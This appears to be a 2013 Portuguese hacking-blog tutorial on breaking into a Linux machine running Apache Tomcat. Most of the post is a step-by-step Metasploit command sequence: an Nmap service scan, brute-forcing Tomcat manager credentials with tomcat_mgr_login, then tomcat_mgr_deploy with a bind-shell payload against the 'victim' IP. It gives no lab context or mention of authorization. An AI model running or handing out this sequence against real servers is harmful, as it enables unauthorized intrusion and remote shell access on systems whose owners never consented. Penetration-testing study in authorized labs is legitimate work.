sexta-feira, 11 de janeiro de 2013

Invasão em micro Linux

           ,       Nenhum comentário    

Invasão em micro Linux
Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo Apache Tomcat - Wikipédia, a enciclopédia livre
O que eu fiz?
Escanei o host com o Nmap,
verifiquei os serviço,
fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.
Comandos:nmap -sV host
use scanner/http/tomcat_mgr_login
set rhost Ip_da_vitima
set rport 8180
exploit
use multi/http/tomcat_mgr_deploy
set rhost Ip_da_vitima
set username Login_capturado
set passwoer Senha_capturada
set rport 8180
set payload linux/x86/shell_bind_tcp
exploit
Programas usados:
Metasploit -> Metasploit Penetration Testing Framework
Nmap -> Download the Free Nmap Security Scanner for Linux/MAC/UNIX or Windows
Manual do nmap em portuguêsGuia de Referência do Nmap (Página do Manual)Baixar:Explorando_vulnerabilidade_linux.rar - 4shared.com - online file sharing and storage - downloadAssisti on-line:Invadindo um micro Linux


Creditos: Bhior
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86